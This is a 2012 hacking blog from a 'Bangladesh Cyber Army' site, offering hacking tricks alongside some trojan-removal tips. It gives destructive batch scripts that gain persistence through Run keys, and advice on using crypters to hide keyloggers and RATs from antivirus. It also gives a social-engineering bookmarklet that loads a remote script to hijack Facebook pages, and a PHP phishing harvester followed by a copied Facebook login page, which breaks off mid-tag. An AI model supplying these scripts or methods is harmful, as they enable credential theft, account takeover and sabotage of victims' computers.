Wellcome To Bangladesh Cyber Army

Bangladesh Cyber Army is Non-profit knowladgebase in Bangladesh. Lets We make a new world,A true World .

Security is the Big Challenge.

Security is your own Right.Everywhere Needs Security.Stay Connected With us.Get Bangladesh Cyber Army Update Tools and Keep secure your System.

Networking is Easiest way to stay connected each other.

Get our Latest Tutorial and Get more knowledge about Networking .

Get Our Unique Program.All feature is Updated.!

Get Up Hacker Every one Don't takes our Glory . We must Won The True Race.

Tuesday, September 25, 2012

Change your My Computer Properties with Image !

Hello Visitor Today I will Explain A simple & nice Tricks For Windows Pc How to change Your Windows Computer Properties.I'll Tell Some way for this work.
Flow The simple step:
Step 1:Just open The Notepad.Type the code bellow.
[General]
Manufacturer=Cyber Army Bangladesh
[Support Information]
Line1=Author: Sajal Mondal
Line2=www.bdcyberarmy.tk
Line3=uwriteme@live.com

Save As it OEMINFO.ini in the C:\WINDOWS\system32 folder.
Make A BMP Image in (160 x 120) resulation .
Save As it oemlogo.bmp in the C:\Windows\system32 folder.
Step 2:Open C:\Windows\system32 & find sysdm.cpl file.Open it by Resource Hacker Software.
Now double click Bitmap in 1 no folder & open it.Then right click 1033 Tab & click Replace resource =>open file with new Bitmap.Add a Bitmap Image in (160 x 120) resulation .Finally File=> Save.
See the screenshot:General 
Support information
Be owner your computer by Another trick.Just download The file & Extract in your computer.
                                                                                                             Thanks for Visiting !

 

 

Batch File Programming Codes(Make your own FUD Batch file virus)

Today I'll tell About Batch File Programming.
Batch programming (or command line programming) has come a long way since early 1980's. More and more commands have been added throughout Windows operating systems DOS/9x/2000/XP/vista. Working with vista offers a lot of versatility when programming batch scripts. Popular user made programs that only tech guys had access to, are now integrated into the Windows Vista operating system. This operating system not only has added a lot of nice commands for basic operation of the command shell, but has continually improved their batch commands and increase functionality and reliability.
Hare Are some Batch File Program Example bellow.
Shut down your pc to batch file code (save as auto shut down.bat)
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo i m going to shut down.
PAUSE

Change inactive file as Txt(save as txtrename.bat)
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Disable internet permanently(save as disnet.bat)
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Your net is blocked!
PAUSE

Temporarily disable internet(save as to Disabletnet.bat)
ipconfig /release
                                                                                                            Thanks For Reading !   
 

KeyLogger (Its a Hacking Tools)

Helo Visitor,  Today I will Explain About Keylogger.
What is keylogger ?
KeyLogger is a spy software.A keylogger also know as keystroke logger is software  which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to monitoring their employers.
How KeyLoger can harm you ?
It can be used by Hackers to get sensitive information such as your username and password, Bank credit card details etc.
Example: You login in to your Facebook or google or any account from a computer in which keylogger is install then your username and password will be captured.
Hacker may be your enemy or friends.

Here Are Some free undetectable keylogger softwares:
♠  REFOG Free Keylogger Download .Read more about
REFOG Keylogger.
♠  Revealer Keylogger Free Edition for Download .Read more about Revealer Keylogger.
♠ Quick FREE Keylogger Download .Read more about Quick FREE Keylogger.
♠ Actual Keylogger Free Download .Read more about Actual Keylogger.
 
This information is educational purpose only.Don't use it For Crime .  

Making keylogger, Rat or Any Spyware agent Fully Undetectable(FUD)

The biggest challenge after creating keylogger, Rat or Any Spyware installation(agent) file, is to convince your victim to install that keylogger on his PC. Normally free remote keyloggers like Emissary keylogger or any other cheap keyloggers will create standard .exe installation file without any stealth feature. Also free keyloggers are easily detected by popular antiviruses. So Eventually your keylogging job will remain Incomplete.
You would have probably heard about binders and Crypters before, but what do they used for? and why they are used in keylogging process? its simple as their Names suggests what they do. Lets first understand these two softwares.
Crypter:
It is a software that can encrypt executable (.exe) files. crypters are popularly used to encrypt viruses, RAT’s, keyloggers, spywares etc to make them undetectable from antiviruses.
The Crypter takes the original binary code of .exe file and applies many encryption on it and stores at the end of file(EOF). So a new crypted executable file is created. The new exe is not detected by antiviruses because its code is scrambled by the crypter.

Binder:
Binder is a software used to bind or combine two or more files in one file under one name and extension.The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file.Now that you, me and the whole world is aware of these softwares, do you think antivirus softwares will allow you to run these softwares on your system?Obviously not. This is the biggest setback for crypters and binders. With increased use of Crypters and binders to bypass antiviruses, AV became more advanced and started including encryption definitions to even detect crypted or binded strings within code. So, use of crypter to hide Keyloggers became more complicated as nowadays, most of the popular crypters & Binders are easily detected by antiviruses.
So, if you are trying to crypt your keyloggers or viruses with publicly available crypters and binders, they are bound to be detected by antiviruses. This is because most FUD(fully undetectable) crypters remain “FUD” for maximum of two or three weeks, after their public release.
When any free Fully Undetectable crypter/binder becomes popular it also gets the eyes of antivirus companies. The antivirus companies update their software and employ detection mechanism that detect the encryption by the crypter. To obtain Fully Undetectable crypters, you either need to search for it in hacking forums or make one by yourself. Soon i will post about creating your own crypter.

Crypters Making your Keylogger or RATs (Remote Access Trojan)

What are Crypters and his use?
As said above, Crypter is hacking program or application used to hide our viruses or RATs from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antiviruses work by splitting source code of application and then search for certain string within source code.
If AV detects any certain malicious strings, it either stops its execution and scan it or deletes the file as virus, making all our efforts useless.

What does Crypters can do?
Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.
What is FUD (Fully Undetectable) ?  
FUD is acronym for Fully Undetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide RATs (Remote Access Trojan) became more complicated as nowadays, no publicly available crypter is FUD.
So, if you crypt RATs (Remote Access Trojan) with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain “FUD” for maximum of one or two days after their public release.

What is trojan horse ?

If you work on a computer regularly, then you might be know about Trojan horse virus and its affect on your computer. It is a virus, which gets attached to some files in your computer and programs that you download from internet. The main characteristic of this virus is that once it gets a way into your computer it starts destroying the files. This is designed in the form of useful software, but it does just the opposite, as it poses many problems for your computer.
Ability of Trojan horse virus
 The main difference amid a normal computer virus and a Trojan horse is that it is not specifically developed for spreading themselves. In its place Trojan horse virus is downloaded either as an infected file from internet, or as payload of some other virus. This virus is capable of stealing end-user information and downloading other mallware to a computer too. To fight with this treacherous virus, your computer is equipped with firewall and you can also install antivirus software in your system. However, an antivirus is not always effective against Trojan horse, so at that instance the way out of the problem is to remove Trojan horse virus manually.                            
How to
Manually Remove Trojan Horse without Antivirus
These are some simple steps, which you can follow to remove Trojan horse virus manually.
♠ Recognize the Trojan: After recognizing a file infected with Trojan horse, it becomes easy to remove it. Usually, your system will give you DLL error, which is associated with Trojan attack. You can copy the error and find out about the affected exe file online.
♠ Stop the function of system restore: If you forget this step, then it will restore the files you will delete.
♠ Restart you computer: when you restart, press F8 and then select safe mode to start your computer.
♠ Go to Add or Remove Programs: You will find this in the control panel, and then remove the programs affected with Trojan horse.
♠ Remove extensions: To delete all files of a program, you should remove them from Windows System folder.
Once you have done the following steps, you should restart your system in normal mode this time.

Other ways of remove Trojan horse virus
Follow these steps:
♠ Display the hidden folders from the folder options
♠ Then restart the system in safe mode
♠ Then stop the processes that are associated with Trojan virus.
However, to complete these steps, you will have to edit your system’s registry.

Remember !For moving the infected files from your registry, you will have to find the file in your RUN folder. Further, when you find the folder you will have to delete the dlls and exe files related to the Trojan names and then finally delete the value. You should also check the Startups and see what programs are loaded automatically when you start your system. This is method is good for those, who have some knowledge about editing the registry. Otherwise, you will have to use an advanced program for removing the Trojan horse virus from your system.

Download  Any Type Trojans Maker  Software.
Remember:THIS IS A VIRUS MAKING SOFTWARE SO SOME ANTIVIRUS MAY DETECT IS AS A VIRUS.BUT ACTUALLY IT IS NOT A VIRUS.
NB:This Tutorial & Software is Educational Purpose only or How Hacker Can Hack your System.Don't use it For crime .
                                                     Thanks For Reading !
 

Sunday, September 9, 2012

Facebook Password Hacking : How To Hack Admin Facebook Fan Page !

Hello Visitor! Yet I have wrote many facebook password hacking tutorials on bdcyberarmy but many of my site visitors asked me about how to hack Facebook fan page. As Facebook Fan Page is an excellent platform for communication and for spreading our bussiness in world, as a reason if which it has become the number one target of hackers.
Today in this article I am going to explain you how to hack Facebook fan page using javascript. As we all know its difficult to hack Facebook fan page but using this method you can hack Facebook fan page easily.
Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc. 
Step 1: First download Facebook page hacking exploit.
                                         Download now
Step 2:Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.
Step 3:Now create a account on free hosting like 0fess.net, 000webhost.com or my3gb.com ( 110mb wont help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this www.yoursite.com/pagehack.js
Step 4:Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack.
See the code bellow !

just Copy & paste this code

 javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)
Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.
Tip: Tell him that it will make your page safe, or something else like attracting.When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.
Thats it..
                                                       

Facebook Hacking,Hotmail Hacking,Gmail Hacking :The esayer way is Phishing !

Helo visitor,
                   Today i will Explain how to get Facebook,Hotmail,Gmail Username & Password by A fake Login page called Fishing.Actually it is old method of Hacking.If your victim is unexpert & low knowledge in Internet Related work then  he/she is perfect the in field.Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal , Payza and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used.
Phishing is an example of social engineering techniques used to fool user or target. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut, Facebook, Gmail, Twitter are also a target of phishing.Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.Lets see How to make A Fishing Scam:
Step 1:-Open The Notepad.
See The Code Bellow !


Just Copy And Paste the Code

<?php
header("Location: http://yourusername.my3gb.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And Save it Fish.php . Note:U must Change this Section.Just Type ctrl+F & replace the lik. http://yourusername.my3gb.com/login.php .It's will be your login.php file Address.
Step 2:-Now go to www.facebook.com & Click the Right Botune then click view page source & copy all Source code.
See The Code Bellow !

Just Copy And Paste the Code

<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}}
envFlush({"ffid1":"AcHg20WRxXHnlZUbdt09epReo47X8PqaRaRYrbHYPSwdlWceHJfM3f5f5bWxC1GeRxY","ffid2":"AcGHF-kiEvC-uZVww8gcN-RXZeFzv1ruUsifEOBEhXkRzjk5PFZIDheFHd_FyZhYQ8U","ffid3":"AcE_BXjPsL59lFzPpaQwhai6lDskBfeVTmxxi2Z6RvcdeC3si1UQe4rciPButLLDbLeXTPR7-SZkhKwOLxw-6kRD","ffid4":"AcH2MwUZ22yH8J96Rrg03CpYa441TNQfgprbrE5NU9HML5L7UhI8tabLhvcnWoLiVyM","ffver":63083,"recaptcha_focus_on_load":"false","recaptcha_lang":"\"en\"","user":"0","locale":"en_US","method":"GET","svn_rev":624088,"tier":"","vip":"69.171.229.16","static_base":"https:\/\/s-static.ak.facebook.com\/","www_base":"http:\/\/www.facebook.com\/","rep_lag":2,"fb_dtsg":"AQC28CyN","ajaxpipe_token":"AXi_L0d2QmZoQGrd","lhsh":"TAQFgSNpK","tracking_domain":"https:\/\/pixel.facebook.com","retry_ajax_on_network_error":"1","fbid_emoticons":"1"});</script><script>envFlush({"eagleEyeConfig":{"seed":"0TA6"}});CavalryLogger=false;window._script_path = "\/index.php";</script><noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript><meta name="robots" content="noodp, noydir" /><meta name="referrer" content="default" id="meta_referrer" /><meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." /><link rel="alternate" media="handheld" href="https://www.facebook.com/" /><title>Welcome to Facebook - Log In, Sign Up or Learn More</title><link rel="shortcut icon" href="https://s-static.ak.facebook.com/rsrc.php/yi/r/q9U99v3_saj.ico" /><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link rel="stylesheet" href="https://s-static.ak.fbcdn.net/rsrc.php/v2/y-/r/2Di1EoTs3fh.css" />
    <link rel="stylesheet" href="https://s-static.ak.fbcdn.net/rsrc.php/v2/ye/r/VvnPQrsVPGy.css" />
    <link rel="stylesheet" href="https://s-static.ak.fbcdn.net/rsrc.php/v2/yY/r/u8iA3kXb8Y1.css" />
    <link rel="stylesheet" href="https://s-static.ak.fbcdn.net/rsrc.php/v2/y0/r/8e04id9zUP-.css" />

    <script src="https://s-static.ak.fbcdn.net/rsrc.php/v2/ye/r/32lBvfX0T3y.js"></script>
  <script>window.Bootloader && Bootloader.done(["qTjMy"]);</script><script>new (require("ServerJS"))().handle({"require":[["lowerDomain"],["QuicklingPrelude"],["Primer"]]})</script></head><body class="fbIndex UIPage_LoggedOut ff4 win Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div class="-cx-PRIVATE-fbLayout__root _li"><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div id="blueBarHolder"><div id="blueBar"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_hv61u8 sx_40f73a"><u>Facebook logo</u></i></a><div class="rfloat"><div class="menu_login_container"><form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVoYSZz5" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email or Phone</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" value="" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton" for="u9qnpz_4"><input value="Log In" tabindex="4" type="submit" id="u9qnpz_4" /></label></td></tr><tr><td class="login_form_label_field"><div class="uiInputLabel clearfix"><input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div><input type="hidden" name="default_persistent" value="0" /></td><td class="login_form_label_field"><a rel="nofollow" href="http://www.facebook.com/recover.php">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" autocomplete="off" name="timezone" value="" id="u9qnpz_3" /><input type="hidden" name="lgnrnd" value="151135_x6td" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /></form></div></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --><div class="gradient"><div class="gradientContent"><div class="clearfix fbIndexFeaturedRegistration"><div class="feature lfloat"><div class="-cx-PRIVATE-indexAppCenter__root _28e"><div class="-cx-PRIVATE-indexAppCenter__shadow _28j"><a class="-cx-PRIVATE-indexAppCenter__link _28f" data-gt="&#123;&quot;type&quot;:&quot;click2appcenter&quot;,&quot;ref&quot;:&quot;index&quot;&#125;" href="/appcenter/?fb_source=index_promotion"><div class="-cx-PRIVATE-indexAppCenter__box _28h uiBoxWhite"><div class="clearfix mls"><img class="mrl mlm -cx-PRIVATE-uiImageBlock__image _8o -cx-PRIVATE-uiImageBlock__largeImage _8t lfloat img" src="https://s-static.ak.facebook.com/rsrc.php/v2/yY/r/2LiCtrj0cdC.png" alt="" width="112" height="130" /><div class="-cx-PRIVATE-uiImageBlock__content _8m "><div><h1 class="mtl -cx-PRIVATE-indexAppCenter__title _28k -cx-PRIVATE-FreightSansFontWin__bold _3m8 -cx-PRIVATE-fbMarketingText__huge _6n -cx-PRIVATE-fbMarketingText__dark _6s -cx-PRIVATE-fbMarketingText__bold _6v ">App Center</h1><h2 class="mbl -cx-PRIVATE-indexAppCenter__subtitle _28l -cx-PRIVATE-FreightSansFontWin__bold _3m8 -cx-PRIVATE-fbMarketingText__huge _6n -cx-PRIVATE-fbMarketingText__dark _6s -cx-PRIVATE-fbMarketingText__bold _6v ">Find great social apps</h2></div></div></div></div></a><div class="-cx-PRIVATE-indexAppCenter__appList _28m -cx-PRIVATE-indexAppCenter__appListSmall _28n"><div class="-cx-PRIVATE-uiInlineBlock__root _6a -cx-PRIVATE-uiInlineBlock__top _6e mrl -cx-PRIVATE-indexAppCenter__appSmall _28o"><a class="-cx-PRIVATE-indexAppCenter__appLink _28g" href="/appcenter/get-spotify?fb_source=index_promotion" data-gt="&#123;&quot;appid&quot;:&quot;174829003346&quot;,&quot;ref&quot;:&quot;index&quot;,&quot;type&quot;:&quot;click2appcenter&quot;&#125;"><img class="-cx-PRIVATE-indexAppCenter__appIcon _28i -cx-PRIVATE-indexAppCenter__appIconSmall _28p img" src="https://fbcdn-photos-a.akamaihd.net/photos-ak-snc7/v85006/196/287530028007964/app_104_287530028007964_853932327.png" alt="" /><div class="fwb">Spotify</div></a></div><div class="-cx-PRIVATE-uiInlineBlock__root _6a -cx-PRIVATE-uiInlineBlock__top _6e mrl -cx-PRIVATE-indexAppCenter__appSmall _28o"><a class="-cx-PRIVATE-indexAppCenter__appLink _28g" href="/appcenter/angrybirds?fb_source=index_promotion" data-gt="&#123;&quot;appid&quot;:&quot;178222352279634&quot;,&quot;ref&quot;:&quot;index&quot;,&quot;type&quot;:&quot;click2appcenter&quot;&#125;"><img class="-cx-PRIVATE-indexAppCenter__appIcon _28i -cx-PRIVATE-indexAppCenter__appIconSmall _28p img" src="https://fbcdn-photos-a.akamaihd.net/photos-ak-snc7/v85005/14/298987460188718/app_104_298987460188718_170436975.png" alt="" /><div class="fwb">Angry Birds Friends</div></a></div><div class="-cx-PRIVATE-uiInlineBlock__root _6a -cx-PRIVATE-uiInlineBlock__top _6e mrl -cx-PRIVATE-indexAppCenter__appSmall _28o"><a class="-cx-PRIVATE-indexAppCenter__appLink _28g" href="/appcenter/simcitysocial?fb_source=index_promotion" data-gt="&#123;&quot;appid&quot;:&quot;225496380820004&quot;,&quot;ref&quot;:&quot;index&quot;,&quot;type&quot;:&quot;click2appcenter&quot;&#125;"><img class="-cx-PRIVATE-indexAppCenter__appIcon _28i -cx-PRIVATE-indexAppCenter__appIconSmall _28p img" src="https://fbcdn-photos-a.akamaihd.net/photos-ak-snc7/v85006/156/156324174503268/app_104_156324174503268_1504955413.png" alt="" /><div class="fwb">SimCity Social</div></a></div><div class="-cx-PRIVATE-uiInlineBlock__root _6a -cx-PRIVATE-uiInlineBlock__top _6e mrl -cx-PRIVATE-indexAppCenter__appSmall _28o"><a class="-cx-PRIVATE-indexAppCenter__appLink _28g" href="/appcenter/chefville?fb_source=index_promotion" data-gt="&#123;&quot;appid&quot;:&quot;180751008671144&quot;,&quot;ref&quot;:&quot;index&quot;,&quot;type&quot;:&quot;click2appcenter&quot;&#125;"><img class="-cx-PRIVATE-indexAppCenter__appIcon _28i -cx-PRIVATE-indexAppCenter__appIconSmall _28p img" src="https://fbcdn-photos-a.akamaihd.net/photos-ak-snc7/v85005/78/344521295633922/app_104_344521295633922_1943760717.png" alt="" /><div class="fwb">ChefVille</div></a></div><div class="-cx-PRIVATE-uiInlineBlock__root _6a -cx-PRIVATE-uiInlineBlock__top _6e mrl -cx-PRIVATE-indexAppCenter__appSmall _28o"><a class="-cx-PRIVATE-indexAppCenter__appLink _28g" href="/appcenter/songpop?fb_source=index_promotion" data-gt="&#123;&quot;appid&quot;:&quot;323595464361460&quot;,&quot;ref&quot;:&quot;index&quot;,&quot;type&quot;:&quot;click2appcenter&quot;&#125;"><img class="-cx-PRIVATE-indexAppCenter__appIcon _28i -cx-PRIVATE-indexAppCenter__appIconSmall _28p img" src="https://fbcdn-photos-a.akamaihd.net/photos-ak-snc7/v85005/226/255889644513526/app_104_255889644513526_1061222291.png" alt="" /><div class="fwb">SongPop</div></a></div></div></div><img src="https://secure-us.imrworldwide.com/cgi-bin/m?ci=ent156564&amp;am=3&amp;ep=1&amp;at=view&amp;rt=banner&amp;st=image&amp;ca=cmp7747&amp;cr=crv72918&amp;pc=plc220331&amp;r=1347142295" /></div></div><div class="signupForm rfloat"><div class="mbm phm headerTextContainer"><div class="mbs mainTitle fsl fwb fcb">Sign Up</div><div class="mbm subtitle fsm fwn fcg">It's free and always will be.</div></div><div id="registration_container"><div data-referrer="simple_registration_form"><noscript><div id="no_js_box"><h2>JavaScript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a JavaScript-capable browser to register for Facebook.</p></div></noscript><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVoYSZz5" autocomplete="off" /><input type="hidden" autocomplete="off" id="reg_instance" name="reg_instance" value="l8JLUN44tZNeCofjw3VkM-ti" /><input type="hidden" autocomplete="off" id="asked_to_login" name="asked_to_login" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><input type="hidden" autocomplete="off" id="terms" name="terms" value="on" /><input type="hidden" autocomplete="off" id="abtest_registration_group" name="abtest_registration_group" value="1" /><input type="hidden" autocomplete="off" id="referrer" name="referrer" value="" /><input type="hidden" autocomplete="off" id="md5pass" name="md5pass" value="" /><input type="hidden" autocomplete="off" id="validate_mx_records" name="validate_mx_records" value="1" /><input type="hidden" autocomplete="off" id="ab_test_data" name="ab_test_data" value="" /><div id="reg_form_box" class="large_form"><table class="uiGrid editor" cellspacing="0" cellpadding="1"><tbody><tr><td class="label"><label for="firstname">First Name:</label></td><td><div class="field_container"><input type="text" class="inputtext" id="firstname" name="firstname" /></div></td></tr><tr><td class="label"><label for="lastname">Last Name:</label></td><td><div class="field_container"><input type="text" class="inputtext" id="lastname" name="lastname" /></div></td></tr><tr><td class="label"><label for="reg_email__">Your Email:</label></td><td><div class="field_container"><input type="text" class="inputtext" id="reg_email__" name="reg_email__" /></div></td></tr><tr><td class="label"><label for="reg_email_confirmation__">Re-enter Email:</label></td><td><div class="field_container"><input type="text" class="inputtext" id="reg_email_confirmation__" name="reg_email_confirmation__" /></div></td></tr><tr><td class="label"><label for="reg_passwd__">New Password:</label></td><td><div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div></td></tr><tr><td class="label">I am:</td><td><div class="field_container"><div class="hidden_elem"><select><option></option><option></option></select><select><option></option><option></option></select></div><select class="select" name="sex" id="sex"><option value="0">Select Sex:</option><option value="1">Female</option><option value="2">Male</option></select></div></td></tr><tr><td class="label">Birthday:</td><td><div class="field_container"> <select name="birthday_month" id="birthday_month" aria-label="Month" class="" onchange="return run_with(this, [&quot;editor&quot;], function() &#123;editor_date_month_change(this, &quot;birthday_day&quot;, &quot;birthday_year&quot;);&#125;);"><option value="-1">Month:</option><option value="1">Jan</option><option value="2">Feb</option><option value="3">Mar</option><option value="4">Apr</option><option value="5">May</option><option value="6">Jun</option><option value="7">Jul</option><option value="8">Aug</option><option value="9">Sep</option><option value="10">Oct</option><option value="11">Nov</option><option value="12">Dec</option></select> <select name="birthday_day" id="birthday_day" aria-label="Day" class=""><option value="-1">Day:</option><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option></select> <select name="birthday_year" id="birthday_year" aria-label="Year" class="" onchange="return run_with(this, [&quot;editor&quot;], function() &#123;editor_date_month_change(&quot;birthday_month&quot;,&quot;birthday_day&quot;,this);&#125;);"><option value="-1">Year:</option><option value="2012">2012</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option></select></div></td></tr><tr><td class="label"></td><td><div id="birthday_warning"><a href="#" ajaxify="/help/ajax/reg_birthday" title="Click for more information" rel="async">Why do I need to provide my birthday?</a></div></td></tr><tr><td class="label"></td><td><div class="fbRegistrationPPT" id="ppt_container"><p class="privacy_policy_text text">By clicking Sign Up, you agree to our <a href="/terms.php" target="_blank" rel="nofollow">Terms</a> and that you have read our <a href="/policy.php" target="_blank" rel="nofollow">Data Use Policy</a>, including our <a href="/help/cookies/" target="_blank" rel="nofollow">Cookie Use</a>.</p></div></td></tr></tbody></table><div class="reg_btn clearfix"><label class="uiButton uiButtonSpecial" for="u9qnpz_1"><input value="Sign Up" onclick="setFormTypeABTest($(&quot;reg&quot;)); RegistrationBootloader.bootloadAndValidate();" type="submit" id="u9qnpz_1" /></label><span id="async_status" class="async_status" style="display: none"><img class="img" 